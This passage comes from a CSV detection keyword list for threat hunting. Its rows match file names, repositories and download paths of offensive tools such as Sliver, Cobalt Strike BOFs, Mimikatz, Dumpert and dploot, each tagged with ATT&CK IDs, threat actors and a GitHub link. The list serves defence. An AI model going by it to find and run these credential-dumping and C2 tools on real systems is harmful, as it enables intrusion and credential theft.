sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/DoUCMe.git*",".{0,1000}\/DoUCMe\.git.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*/download/v*/sliver-client_linux*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/download/v1.0/payload.dll*",".{0,1000}\/download\/v1\.0\/payload\.dll.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/download/v1.1.0/pspy32*",".{0,1000}\/download\/v1\.1\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" 
"*/download/v1.1.0/pspy64*",".{0,1000}\/download\/v1\.1\.0\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.2.0/pspy32*",".{0,1000}\/download\/v1\.2\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.2.1/pspy32*",".{0,1000}\/download\/v1\.2\.1\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.2.1/pspy64*",".{0,1000}\/download\/v1\.2\.1\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/downloadexec.lua*",".{0,1000}\/downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/download-stager.js*",".{0,1000}\/download\-stager\.js.{0,1000}","offensive_tool_keyword","empire","Starkiller is a 
Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*/dpap-brute.nse*",".{0,1000}\/dpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Dpapi.ps1*",".{0,1000}\/Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/dpapi_domain_backupkey.py*",".{0,1000}\/dpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/dpapi_masterkey.py*",".{0,1000}\/dpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/DPAPImk2john.py*",".{0,1000}\/DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/dpipe.sh*",".{0,1000}\/dpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation 
tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","62","27","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" "*/dpkg/info/tor.list*",".{0,1000}\/dpkg\/info\/tor\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/dploot.git*",".{0,1000}\/dploot\.git.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*/DragonCastle.git*",".{0,1000}\/DragonCastle\.git.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*/DragonCastle.pdb*",".{0,1000}\/DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*/dragoncastle.py*",".{0,1000}\/dragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines 
AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*/drda-brute.nse*",".{0,1000}\/drda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/drda-info.nse*",".{0,1000}\/drda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DReverseProxy.git*",".{0,1000}\/DReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/Drones/SleepDialogue.razor*",".{0,1000}\/Drones\/SleepDialogue\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
"*/drop-sc.py*",".{0,1000}\/drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/drunkpotato*",".{0,1000}\/drunkpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Drupwn*",".{0,1000}\/Drupwn.{0,1000}","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/immunIT/drupwn","1","0","N/A","N/A","6","561","131","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z" "*/DSInternals.psd1*",".{0,1000}\/DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","1","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*/dsniff.c*",".{0,1000}\/dsniff\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. 
full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dsniff.services*",".{0,1000}\/dsniff\.services.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/DUBrute.git*",".{0,1000}\/DUBrute\.git.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*/DuckDuckC2.git*",".{0,1000}\/DuckDuckC2\.git.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*/ducky.py",".{0,1000}\/ducky\.py","offensive_tool_keyword","empire","Empire scripts 
paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/DueDLLigence.git*",".{0,1000}\/DueDLLigence\.git.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" 
"*/dukes_apt29.profile*",".{0,1000}\/dukes_apt29\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/dump.ps1*",".{0,1000}\/dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/dump_lsass.*",".{0,1000}\/dump_lsass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/DumpAADSyncCreds.git*",".{0,1000}\/DumpAADSyncCreds\.git.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*/DumpCerts*",".{0,1000}\/DumpCerts.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/DumpCreds*",".{0,1000}\/DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/dumpCredStore.ps1*",".{0,1000}\/dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/dumper.ps1*",".{0,1000}\/dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/dumpert.c*",".{0,1000}\/dumpert\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*/Dumpert/*",".{0,1000}\/Dumpert\/.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
